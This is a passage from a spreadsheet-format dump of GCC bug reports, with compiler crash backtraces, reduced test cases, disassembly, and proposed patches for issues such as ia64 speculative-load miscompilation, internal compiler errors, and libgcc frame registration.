 4408050:       08 00 00 00 01 00       [MMI]       nop.m 0x0
 4408056:       60 72 98 00 40 00                   add r38=r14r38
 440805c:       00 00 04 00                         nop.i 0x0
 4408060:       03 70 00 22 38 10       [MII]       ld8.s r14=[r17]
 4408066:       00 00 00 02 00 20                   nop.i 0x0
 440806c:       05 30 59 00                         sxt4 r41=r38
 4408070:       08 00 00 00 01 00       [MMI]       nop.m 0x0
 4408076:       00 00 00 02 00 00                   nop.m 0x0
 440807c:       00 00 04 00                         nop.i 0x0
 4408080:       09 80 00 24 38 10       [MMI]       ld8.s r16=[r18]
 4408086:       00 00 00 02 00 c0                   nop.m 0x0
 440808c:       00 a0 1c e4                         cmp.eq p6p7=0r20
 4408090:       f1 a0 fc 29 3f 23       [MIB] (p07) adds r20=-1r20
 4408096:       00 00 00 02 80 03                   nop.i 0x0
 440809c:       a0 00 00 43                   (p07) br.cond.dpnt.few 4408130 
...
 4408130:       01 00 00 00 01 00       [MII]       nop.m 0x0
 4408136:       f0 00 54 22 00 00                   zxt2 r15=r21
 440813c:       32 b1 38 80                         or r16=r19r22
 4408140:       00 00 3c 3a 88 11       [MII]       st2 [r29]=r15
 4408146:       60 81 f8 9c 29 00                   dep.z r22=r16115
 440814c:       02 80 44 00                         zxt2 r16=r16
 4408150:       18 00 50 34 98 11       [MMB]       st8 [r26]=r20
 4408156:       00 00 00 02 00 00                   nop.m 0x0
 440815c:       00 00 00 20                         nop.b 0x0
 4408160:       11 00 00 00 01 00       [MIB]       nop.m 0x0
 4408166:       70 b9 60 00 40 00                   add r23=r23r24     &lt;===== NaT bit not yet consumed
 440816c:       30 00 00 40                         br.few 4408190 
...
 4408190:       10 00 00 00 01 00       [MIB]       nop.m 0x0
 4408196:       60 01 58 22 00 00                   zxt2 r22=r22
 440819c:       00 00 00 20                         nop.b 0x0
 44081a0:       09 b8 00 2e 08 10       [MMI]       ld2 r23=[r23]       &lt;===== NaT consumption vector
In short after doing the speculative load to r23 a conditional branch is taken to code path which uses the speculatively-loaded register without first running chk.s on it. So if the register has a NaT bit set (such as after a deferred exception) there is going to be the NaT consumption vector interruption on address 44081a0 above.
The issue did not show with GCC 4.8.1 but shows with GCC 5.1.0. Don't know about the versions in between. The issue is also somewhat similar to an already fixed Bug ID #53975. The same workaround applies i.e. -fno-selective-scheduling -fno-selective-scheduling2 will prevent the bug from occurring.</t>
  </si>
  <si>
    <t>abel</t>
  </si>
  <si>
    <t>GCC-79569</t>
  </si>
  <si>
    <t>Unrecognized command line option â€˜-m3dnowaâ€™</t>
  </si>
  <si>
    <t>I know that it's probably very legacy target option however we still offer it but don't accept:
$ gcc --help=target -Q | grep 3dnowa
  -m3dnowa                    		[disabled]
$ gcc  /tmp/empty.c -m3dnowa
cc1: error: unrecognized command line option â€˜-m3dnowaâ€™
All releases I have behave the same.</t>
  </si>
  <si>
    <t>GCC-71828</t>
  </si>
  <si>
    <t>[6/7 regression] ICE on valid C++11 code with constexpr __Complex int variable declaration: in operand_equal_p at fold-const.c:2790</t>
  </si>
  <si>
    <t>The following C++11 code causes an ICE when compiled with the current GCC trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.  
This is a regression from 6.1.x.
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160709 (experimental) [trunk revision 238191] (GCC) 
$ 
$ g++-6.1 -c small.cpp
$ 
$ g++-trunk -c small.cpp
small.cpp:3:44: internal compiler error: in operand_equal_p at fold-const.c:2790
 static_assert (
                                            ^
0xab89b0 operand_equal_p(tree_node const* tree_node const* unsigned int)
        ../../gcc-source-trunk/gcc/fold-const.c:2790
0xab70e9 operand_equal_p(tree_node const* tree_node const* unsigned int)
        ../../gcc-source-trunk/gcc/fold-const.c:2951
0xab6cbf operand_equal_p(tree_node const* tree_node const* unsigned int)
        ../../gcc-source-trunk/gcc/fold-const.c:2749
0x1226391 generic_simplify_EQ_EXPR
        /tmp/gcc-builder/gcc-build-trunk/gcc/generic-match.c:27436
0x122ab55 generic_simplify(unsigned int tree_code tree_node* tree_node* tree_node*)
        /tmp/gcc-builder/gcc-build-trunk/gcc/generic-match.c:31021
0xac73f7 fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
        ../../gcc-source-trunk/gcc/fold-const.c:9161
0x8aeba8 cxx_eval_binary_expression
        ../../gcc-source-trunk/gcc/cp/constexpr.c:1816
0x8ab4d7 cxx_eval_constant_expression
        ../../gcc-source-trunk/gcc/cp/constexpr.c:3885
0x8b1ec9 cxx_eval_outermost_constant_expr
        ../../gcc-source-trunk/gcc/cp/constexpr.c:4211
0x8b4ec8 maybe_constant_value_1
        ../../gcc-source-trunk/gcc/cp/constexpr.c:4405
0x8b4ec8 maybe_constant_value(tree_node* tree_node*)
        ../../gcc-source-trunk/gcc/cp/constexpr.c:4429
0x81ded5 finish_static_assert(tree_node* tree_node* unsigned int bool)
        ../../gcc-source-trunk/gcc/cp/semantics.c:8749
0x79c370 cp_parser_static_assert
        ../../gcc-source-trunk/gcc/cp/parser.c:13056
0x7ae489 cp_parser_block_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12247
0x7b6d50 cp_parser_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12148
0x7b5824 cp_parser_declaration_seq_opt
        ../../gcc-source-trunk/gcc/cp/parser.c:12027
0x7b5b58 cp_parser_translation_unit
        ../../gcc-source-trunk/gcc/cp/parser.c:4329
0x7b5b58 c_parse_file()
        ../../gcc-source-trunk/gcc/cp/parser.c:37505
0x919dc2 c_common_parse_file()
        ../../gcc-source-trunk/gcc/c-family/c-opts.c:1070
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------------------------
constexpr _Complex int a {1 1}
static_assert (</t>
  </si>
  <si>
    <t>GCC-33455</t>
  </si>
  <si>
    <t>MERGE intrinsic: Check for same string lengths</t>
  </si>
  <si>
    <t>See 31610 for another example.
13.7.75 MERGE (TSOURCE FSOURCE MASK)
FSOURCE shall be of the same type and type parameters as TSOURCE.
NAG f95:
Error: merge_char_3.f90 line 4: Unequal character lengths (2 and 3) in MERGE intrinsic
Error: merge_char_3.f90 line 5: Unequal character lengths (2 and 3) in MERGE intrinsic
implicit none
character(len=2) :: a
character(len=3) :: b
print * merge(ab.true.)  ! { dg-error Unequal character lengths }
print * merge('aa''bbb'.true.)  ! { dg-error Unequal character lengths }
end
First version of a patch follows. However it does not detect the second transfer as for 'aa' expr-&gt;ts.cl-&gt;length etc. is not set but only expr-&gt;value.character.length (cf. match_string_constant). (Note: setting cl.* in 
match_string_constant does not completely work: In gfortran.dg/char_length_1.f90 the warning for line 12 and 14 is then suppressed.)
Index: check.c
===================================================================
--- check.c     (Revision 128550)
+++ check.c     (Arbeitskopie)
@@ -18206 +182023 @@
   if (same_type_check (tsource 0 fsource 1) == FAILURE)
     return FAILURE
+  /* In case of characters the string lengths need to match.  */
+  if (tsource-&gt;ts.type == BT_CHARACTER &amp;&amp; tsource-&gt;ts.cl
+      &amp;&amp; tsource-&gt;ts.cl-&gt;length &amp;&amp; fsource-&gt;ts.cl &amp;&amp; fsource-&gt;ts.cl-&gt;length
+      &amp;&amp; tsource-&gt;ts.cl-&gt;length-&gt;expr_type == EXPR_CONSTANT
+      &amp;&amp; fsource-&gt;ts.cl-&gt;length-&gt;expr_type == EXPR_CONSTANT
+      &amp;&amp; mpz_cmp (tsource-&gt;ts.cl-&gt;length-&gt;value.integer
+                 fsource-&gt;ts.cl-&gt;length-&gt;value.integer) != 0)
+    {
+      gfc_error (Unequal character lengths (%ld and %ld) in MERGE 
+                intrinsic at %L
+                mpz_get_si (tsource-&gt;ts.cl-&gt;length-&gt;value.integer)
+                mpz_get_si (fsource-&gt;ts.cl-&gt;length-&gt;value.integer)
+                
+      return FAILURE
+    }
+
+
   if (type_check (mask 2 BT_LOGICAL) == FAILURE)
     return FAILURE
In case some one is interested in the match_string_constant change (which causes the warn regression) here it comes:
Index: primary.c
===================================================================
--- primary.c   (Revision 128550)
+++ primary.c   (Arbeitskopie)
@@ -9466 +9468 @@ got_delim:
   e-&gt;value.character.string = p = gfc_getmem (length + 1)
   e-&gt;value.character.length = length
+  e-&gt;ts.cl = gfc_get_charlen ()
+  e-&gt;ts.cl-&gt;length = gfc_int_expr (length)
   gfc_current_locus = start_locus
   gfc_next_char ()            /* Skip delimiter */</t>
  </si>
  <si>
    <t>GCC-45119</t>
  </si>
  <si>
    <t>[4.6 Regression] Bootstrap went to infinite loop</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 162656 went into infinite loop during
bootstrap:
11445 hjl       20   0 57792  13m 9724 R 100.1  0.2 278:42.87 cc1               
11509 hjl       20   0 60884  21m  13m R 100.1  0.3 278:40.99 cc1               
11527 hjl       20   0 63292  23m  13m R 100.1  0.3 278:32.08 cc1               
11939 hjl       20   0 59564  15m  10m R 99.7  0.2 277:24.65 cc1
when building libgcc:
   (gdb) bt
#0  0x08d517b5 in memory_address_addr_space_p (mode=QImode addr=0xf755ba50 
    as=0 '\000') at ../../src-trunk/gcc/recog.c:1287
#1  0x096ba93a in get_address_cost (symbol_present=0 '\000' 
    var_present=1 '\001' offset=1 ratio=1 cstep=1 mem_mode=QImode 
    as=0 '\000' speed=1 '\001' stmt_after_inc=0 '\000' 
    may_autoinc=0xffdcd25b \377)
    at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:3261
#2  0x096be013 in get_computation_cost_at (data=0xffdcd338 use=0xb2eac30 
    cand=0xb2c0ca0 address_p=1 '\001' depends_on=0xffdcd25c at=0xf755ca20 
    can_autoinc=0xffdcd25b \377 inv_expr_id=0xffdcd254)
    at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:4083
#3  0x096be480 in get_computation_cost (data=0xffdcd338 use=0xb2eac30 
    cand=0xb2c0ca0 address_p=1 '\001' depends_on=0xffdcd25c 
    can_autoinc=0xffdcd25b \377 inv_expr_id=0xffdcd254)
    at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:4148
#4  0x096be5e3 in determine_use_iv_cost_address (data=0xffdcd338 
    use=0xb2eac30 cand=0xb2c0ca0)
    at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:4194
#5  0x096bf0ad in determine_use_iv_cost (data=0xffdcd338 use=0xb2eac30 
    cand=0xb2c0ca0) at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:4470
#6  0x096bf378 in determine_use_iv_costs (data=0xffdcd338)
    at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:4573
#7  0x096c4160 in tree_ssa_iv_optimize_loop (data=0xffdcd338 loop=0xf7544ec8)
---Type  to continue or q  to quit---
    at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:6385
#8  0x096c424f in tree_ssa_iv_optimize ()
    at ../../src-trunk/gcc/tree-ssa-loop-ivopts.c:6432
#9  0x0974c79d in tree_ssa_loop_ivopts ()
    at ../../src-trunk/gcc/tree-ssa-loop.c:634
#10 0x08c6b1d8 in execute_one_pass (pass=0xabd9820)
    at ../../src-trunk/gcc/passes.c:1564
#11 0x08c6b3ac in execute_pass_list (pass=0xabd9820)
    at ../../src-trunk/gcc/passes.c:1619
#12 0x08c6b3c8 in execute_pass_list (pass=0xabd9420)
    at ../../src-trunk/gcc/passes.c:1620
#13 0x08c6b3c8 in execute_pass_list (pass=0xabd8da0)
    at ../../src-trunk/gcc/passes.c:1620
#14 0x092e475b in tree_rest_of_compilation (fndecl=0xf752a800)
    at ../../src-trunk/gcc/tree-optimize.c:452
#15 0x09d7985b in cgraph_expand_function (node=0xf7537e8c)
    at ../../src-trunk/gcc/cgraphunit.c:1643
#16 0x09d79ac6 in cgraph_expand_all_functions ()
    at ../../src-trunk/gcc/cgraphunit.c:1722
#17 0x09d7a0b8 in cgraph_optimize () at ../../src-trunk/gcc/cgraphunit.c:1978
#18 0x09d77e02 in cgraph_finalize_compilation_unit ()
    at ../../src-trunk/gcc/cgraphunit.c:1185
#19 0x081116af in c_write_global_declarations ()
---Type  to continue or q  to quit---
    at ../../src-trunk/gcc/c-decl.c:9698
#20 0x08fe14db in compile_file () at ../../src-trunk/gcc/toplev.c:957
#21 0x08fe3483 in do_compile () at ../../src-trunk/gcc/toplev.c:2295
#22 0x08fe3549 in toplev_main (argc=63 argv=0xffdcd724)
    at ../../src-trunk/gcc/toplev.c:2336
#23 0x082e040e in main (argc=63 argv=0xffdcd724)
    at ../../src-trunk/gcc/main.c:36
(gdb) 
Revision 162645 is OK.</t>
  </si>
  <si>
    <t>GCC-9651</t>
  </si>
  <si>
    <t>[Alpha] FPE with NAN in spite of isnan protection</t>
  </si>
  <si>
    <t>% cat test.cc
#include 
double f(void)
int foo() {
    double d = f()
    if (isnan(d) || (d != (int) d))
        d = 0
    return (int) d
}
double f(void) { return NAN }
int main() { return foo() }
% g++ -O2 -mcpu=ev4 test.cc &amp;&amp; ./a.out
zsh: floating point exception (core dumped)  ./a.out
It looks like a cvttq/c was dragged out of the second condition:
[...]
        .prologue 1
        jsr $26($27)_Z1fv             !lituse_jsr!4
        ldah $290($26)         !gpdisp!5
        lda $290($29)          !gpdisp!5
        cpys $f0$f0$f2
        cpys $f0$f0$f16
        ldq $27__isnan($29)            !literal!2
        jsr $26($27)__isnan           !lituse_jsr!2
        ldah $290($26)         !gpdisp!3
        lda $290($29)          !gpdisp!3
-&gt;      cvttq/c $f2$f10
        stt $f1016($30)
        cpys $f31$f31$f31
        ldq $116($30)
        bne $0$L3
Release:
3.4 20030203 (experimental)
Environment:
System: Linux juist 2.5.59 #4 Sat Jan 18 12:46:41 CET 2003 alpha unknown unknown GNU/Linux
Architecture: alpha
host: alphaev68-unknown-linux-gnu
build: alphaev68-unknown-linux-gnu
target: alphaev68-unknown-linux-gnu
configured with: ../configure --disable-nls --enable-languags=c++ --with-gcc-version-trigger=/src/gcc-2003.02.03/gcc/version.c --no-create --no-recursion : (reconfigured) ../configure --disable-nls --enable-languages=c++</t>
  </si>
  <si>
    <t>GCC-57982</t>
  </si>
  <si>
    <t>GetModuleHandle in __register_frame_info causes abort on unload</t>
  </si>
  <si>
    <t>Say we have modules Foo and Bar. Foo links against shared libgcc but Bar does not. Now if we load Foo load Bar unload Foo then unload Bar then Bar's initialization code finds libgcc and registers itself with it but Bar's deinitializaton code doesn't find libgcc tries to instead unregister with Foo's internal data structures finds them uninitialized and aborts.
The right fix for libgcc looks something like this:
--- config/i386/cygming-crtbegin.c.orig 2013-07-25 00:07:35.000000000 -0800
+++ config/i386/cygming-crtbegin.c      2013-07-25 00:33:11.000000000 -0800
@@ -826 +828 @@
 extern void __gcc_register_frame (void)
 extern void __gcc_deregister_frame (void)
+static HANDLE libgcc_dll
+
 void
 __gcc_register_frame (void)
 {
@@ -948 +9611 @@
   void (*register_frame_fn) (const void * struct object *)
   HANDLE h = GetModuleHandle (LIBGCC_SONAME)
   if (h)
-    register_frame_fn = (void (*) (const void * struct object *))
-                       GetProcAddress (h __register_frame_info)
+    {
+      libgcc_dll = LoadLibrary (LIBGCC_SONAME) /* Hold reference */
+      register_frame_fn = (void (*) (const void * struct object *))
+       GetProcAddress (h __register_frame_info)
+    }
   else
     register_frame_fn = __register_frame_info
   if (register_frame_fn)
@@ -12413 +12916 @@
 {
 #if DWARF2_UNWIND_INFO
   void *  (*deregister_frame_fn) (const void *)
-  HANDLE h = GetModuleHandle (LIBGCC_SONAME)
-  if (h)
+  if (libgcc_dll)
     deregister_frame_fn = (void* (*) (const void *))
-                         GetProcAddress (libgcc_dl __deregister_frame_info)
+      GetProcAddress (libgcc_dll __deregister_frame_info)
   else
     deregister_frame_fn = __deregister_frame_info
   if (deregister_frame_fn)
      deregister_frame_fn (__EH_FRAME_BEGIN__)
+
+  if (libgcc_dll)
+    FreeLibrary (libgcc_dll)
+
 #endif
The problem is that this code is baked into every module compiled with the buggy
libgcc. You have to recompile the world to fix it for good.</t>
  </si>
  <si>
    <t>dancol</t>
  </si>
  <si>
    <t>GCC-10952</t>
  </si>
  <si>
    <t>ICE (segfault) in redeclare_class_template at cp/pt.c:2999</t>
  </si>
  <si>
    <t>The following piece of (obviously illegal) code ICEs all
versions of gcc since at least 2.95 without a prior error message:
------------- cut----------------
template 
struct unary_transform_modifier 
template &lt;
class unary_transform_modifier
{
------------- cut----------------
    regards  Christian</t>
  </si>
  <si>
    <t>GCC-82381</t>
  </si>
  <si>
    <t>[8 Regression] internal compiler error: qsort checking failed</t>
  </si>
  <si>
    <t>GCC trunk rev 253307 x86_64.
This looks like a fresh regression. I see quite many fails like this one.
&gt; cat f.cpp
char b h
unsigned short c e
short d f g
void i() {
  if (h) {
    short a(-(d + c - b))
    f = e - a - -d
  }
  if (c)
    g = 0
}
&gt; g++ -O2 -c f.cpp
f.cpp: In function â€˜void i()â€™:
f.cpp:4:6: error: qsort comparator non-negative on sorted output: 1
 void i() {
      ^
during GIMPLE pass: reassoc
f.cpp:4:6: internal compiler error: qsort checking failed
0x8fbc82 qsort_chk_error
        ../../gcc/gcc/vec.c:222
0x8fbcfb qsort_chk(void* unsigned long unsigned long int (*)(void const* void const*))
        ../../gcc/gcc/vec.c:274
0x7d9118 vec::qsort(int (*)(void const* void const*))
        ../../gcc/gcc/vec.h:973
0x7d9118 vec::qsort(int (*)(void const* void const*))
        ../../gcc/gcc/vec.h:1735
0x7d9118 reassociate_bb
        ../../gcc/gcc/tree-ssa-reassoc.c:5839
0x7d755b reassociate_bb
        ../../gcc/gcc/tree-ssa-reassoc.c:5979
0x7d755b reassociate_bb
        ../../gcc/gcc/tree-ssa-reassoc.c:5979
0x7d755b reassociate_bb
        ../../gcc/gcc/tree-ssa-reassoc.c:5979
0x109673c do_reassoc
        ../../gcc/gcc/tree-ssa-reassoc.c:6093
0x109673c execute_reassoc
        ../../gcc/gcc/tree-ssa-reassoc.c:6180
0x109673c execute
        ../../gcc/gcc/tree-ssa-reassoc.c:6219
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>babokin</t>
  </si>
  <si>
    <t>GCC-21551</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ia64 bootstrap failed</t>
  </si>
  <si>
    <t>As of Fri May 13 05:21:49 UTC 2005 gcc 4.0 failed to bootstrap on ia64:
./xgcc -B./ -B/usr/gcc-4.0/ia64-unknown-linux-gnu/bin/ -isystem
/usr/gcc-4.0/ia64-unknown-linux-gnu/include -isystem
/usr/gcc-4.0/ia64-unknown-linux-gnu/sys-include
-L/export/build/gnu/gcc-4.0/build-ia64-linux/gcc/../ld -O2  -DIN_GCC   
-DUSE_LIBUNWIND_EXCEPTIONS -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC
-DUSE_GAS_SYMVER -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED 
-I. -I. -I/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc
-I/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/.
-I/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/../include
-I/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/../libcpp/include   -fexceptions
-fvisibility=hidden -DHIDE_EXPORTS -c
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c -o
libgcc/./unwind-ia64.o
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c: In function
\uffff\uffff\uffffalloc_reg_state\uffff\uffff\uffff:
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c:312: warning:
pointer targets in passing argument 1 of
\uffff\uffff\uffffatomic_alloc\uffff\uffff\uffff differ in
signedness/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c: In
function \uffff\uffff\ufffffree_reg_state\uffff\uffff\uffff:
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c:328: warning:
pointer targets in passing argument 1 of
\uffff\uffff\uffffatomic_free\uffff\uffff\uffff differ in signedness
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c: In function
\uffff\uffff\uffffalloc_label_state\uffff\uffff\uffff:
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c:345: warning:
pointer targets in passing argument 1 of
\uffff\uffff\uffffatomic_alloc\uffff\uffff\uffff differ in
signedness/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c: In
function \uffff\uffff\ufffffree_label_state\uffff\uffff\uffff:
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c:361: warning:
pointer targets in passing argument 1 of
\uffff\uffff\uffffatomic_free\uffff\uffff\uffff differ in signedness
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c: In function
\uffff\uffff\uffffdesc_prologue\uffff\uffff\uffff:
/net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/config/ia64/unwind-ia64.c:605: internal
compiler error: Illegal instruction
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [libgcc/./unwind-ia64_s.o] Error 1
make[5]: Leaving directory `/export/build/gnu/gcc-4.0/build-ia64-linux/gcc'
make[4]: *** [libgcc.a] Error 2
make[4]: Leaving directory `/export/build/gnu/gcc-4.0/build-ia64-linux/gcc'
make[3]: *** [stage2_build] Error 2
make[3]: Leaving directory `/export/build/gnu/gcc-4.0/build-ia64-linux/gcc'
make[2]: *** [bootstrap] Error 2
Program received signal SIGILL Illegal instruction.
0x40000000002c9e70 in store_bit_field (str_rtx=Variable str_rtx is not available.
)
    at /net/gnu/export/gnu/src/gcc-4.0/gcc/gcc/expmed.c:742
742           if (! ((*insn_data[(int) CODE_FOR_insv].operand[3].predicate)
(gdb) p/x $ip
$1 = 0x40000000002c9e70
0x40000000002c9e60 :      [MMI]       adds r14=72r14
0x40000000002c9e61 :                  ld8 r8=[r14]
0x40000000002c9e62 :                  nop.i 0x0
0x40000000002c9e70 :      [MMI]       ld8 r14=[r8]8
0x40000000002c9e71 :                  ld8 r1=[r8]
0x40000000002c9e72 :                  mov b6=r14
(gdb) p/x $r8
$2 = 0x74696e695f636576
(gdb) p/x $r14
$3 = 0x400000000073f458
(gdb) p (long *) 0x400000000073f458
$4 = (long *) 0x400000000073f458
(gdb) p *(long *) 0x400000000073f458
$5 = 8388357179805230454
(gdb) p/x *(long *) 0x400000000073f458
$6 = 0x74696e695f636576</t>
  </si>
  <si>
    <t>GCC-3275</t>
  </si>
  <si>
    <t>Assembler: unwind-dw2.c</t>
  </si>
  <si>
    <t>install instructions are follows
./configure --prefix=/opt/local
make
I've got the following message.
(cd po &amp;&amp; make all)
make GCC_FOR_TARGET=/home/pavo/ugai/src/gcc-3.0/gcc/xgcc -B/home/pavo/ugai/src/gcc-3.0/gcc/ -B/opt/local/i386-pc-solaris2.8/bin/ -B/opt/local/i386-pc-solaris2.8/lib/ -isystem /opt/local/i386-pc-solaris2.8/include \
  HOST_PREFIX= HOST_PREFIX_1=loser- \
  AR_FOR_TARGET=ar \
  AR_CREATE_FOR_TARGET=ar  rc \
  AR_FLAGS_FOR_TARGET= \
  OLDCC=cc CCLIBFLAGS=-O \
  CFLAGS=-g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long \
  RANLIB_FOR_TARGET=true \
  RANLIB_TEST_FOR_TARGET=[ -f true ]  || ( [ i386-pc-solaris2.8 = i386-pc-solaris2.8 ]  &amp;&amp; [ -f /usr/bin/ranlib -o -f /bin/ranlib ] ) \
  NM_FOR_TARGET=/usr/ccs/bin/nm AWK=gawk \
  LIBGCC2_CFLAGS=-O2   -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1 -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED \
  INCLUDES=-I. -I. -I. -I./.  -I./config -I./../include MAYBE_USE_COLLECT2= \
  CONFIG_H=tconfig.h  insn-codes.h insn-flags.h MACHMODE_H=machmode.h machmode.def \
  LIB1ASMSRC='' \
  MAKEOVERRIDES= \
  -f libgcc.mk all
for d in libgcc do \
  if [ -d $d ] then true else mkdir $d fi \
done
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
/home/pavo/ugai/src/gcc-3.0/gcc/xgcc -B/home/pavo/ugai/src/gcc-3.0/gcc/ -B/opt/local/i386-pc-solaris2.8/bin/ -B/opt/local/i386-pc-solaris2.8/lib/ -isystem /opt/local/i386-pc-solaris2.8/include -O2   -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1 -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -I. -I. -I. -I./.  -I./config -I./../include -fexceptions -c ./unwind-dw2.c -o libgcc/./unwind-dw2.o
unwind-dw2.c: In function `extract_cie_info':
unwind-dw2.c:219: warning: implicit declaration of function `strlen'
unwind-dw2.c: In function `execute_stack_op':
unwind-dw2.c:300: warning: `result' might be used uninitialized in this function
unwind-dw2.c: In function `execute_cfa_program':
unwind-dw2.c:775: warning: implicit declaration of function `alloca'
unwind-dw2.c: In function `uw_frame_state_for':
unwind-dw2.c:886: warning: implicit declaration of function `memset'
unwind-dw2.c: In function `uw_install_context_1':
unwind-dw2.c:1088: warning: missing braces around initializer
unwind-dw2.c:1088: warning: (near initialization for `once_regsizes.__pthread_once_pad')
unwind-dw2.c:1103: warning: implicit declaration of function `memcpy'
Assembler: unwind-dw2.c
	/var/tmp/cctnOKys.s line 4264 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4287 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4318 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4345 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4382 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4425 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4468 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4507 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4542 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4571 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4606 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4637 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4680 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4723 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4760 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4795 : Illegal subtraction
	/var/tmp/cctnOKys.s line 4834 : Illegal subtraction
*** Error code 1
make: Fatal error: Command failed for target `libgcc/unwind-dw2.o'
Current working directory /home/pavo/ugai/src/gcc-3.0/gcc
*** Error code 1
make: Fatal error: Command failed for target `libgcc.a'
Current working directory /home/pavo/ugai/src/gcc-3.0/gcc
*** Error code 1
make: Fatal error: Command failed for target `all-gcc'
Release:
3.0
Environment:
System: SunOS pavo 5.8 Generic_108529-06 i86pc i386 i86pc
Architecture: i86pc
host: i386-pc-solaris2.8
build: i386-pc-solaris2.8
target: i386-pc-solaris2.8
configured with: ./configure --prefix=/opt/local
How-To-Repeat:
always</t>
  </si>
  <si>
    <t>ugai</t>
  </si>
  <si>
    <t>GCC-21041</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] ICE: output_operand: Cannot decompose address</t>
  </si>
  <si>
    <t>The below testcase is extracted from smpeg.  It's C++.  Compile it like 
so: 
% ./gcc/cc1plus -O2 -fPIC video.ii 
video.cpp: In function 'int ParseMacroBlock(VidStream*)': 
video.cpp:2205: internal compiler error: output_operand: Cannot decompose 
address. 
I wasn't able to make the functions much smaller than this (didn't try 
reducing the headers though).</t>
  </si>
  <si>
    <t>GCC-65475</t>
  </si>
  <si>
    <t>[5 Regression] ICE in odr_vtable_hasher::equal (Segmentation fault)</t>
  </si>
  <si>
    <t>Hi.
Following ICE can be seen in boost library:
$ g++ -O2 1.ii 2.ii -flto
1.ii:4:45: warning: type â€˜struct failureâ€™ violates one definition rule [-Wodr]
   class __attribute((__abi_tag__(cxx11))) failure : A {}
                                             ^
2.ii:4:45: note: a type with different virtual table pointers is defined in another translation unit
   class __attribute((__abi_tag__(cxx11))) failure {
                                             ^
1.ii:4:45: warning: type â€˜struct failureâ€™ violates one definition rule [-Wodr]
   class __attribute((__abi_tag__(cxx11))) failure : A {}
                                             ^
2.ii:4:45: note: a type with different bases is defined in another translation unit
   class __attribute((__abi_tag__(cxx11))) failure {
                                             ^
lto1: internal compiler error: Segmentation fault
0x9024df crash_signal
	../../gcc/toplev.c:383
0x781cf1 odr_vtable_hasher::equal(odr_type_d const* tree_node const*)
	../../gcc/ipa-devirt.c:591
0x781cf1 hash_table::find_slot_with_hash(tree_node const* unsigned int insert_option)
	../../gcc/hash-table.h:981
0x77b9bd get_odr_type(tree_node* bool)
	../../gcc/ipa-devirt.c:1717
0x77d32c register_odr_type(tree_node*)
	../../gcc/ipa-devirt.c:1839
0x5b4566 lto_read_decls
	../../gcc/lto/lto.c:1946
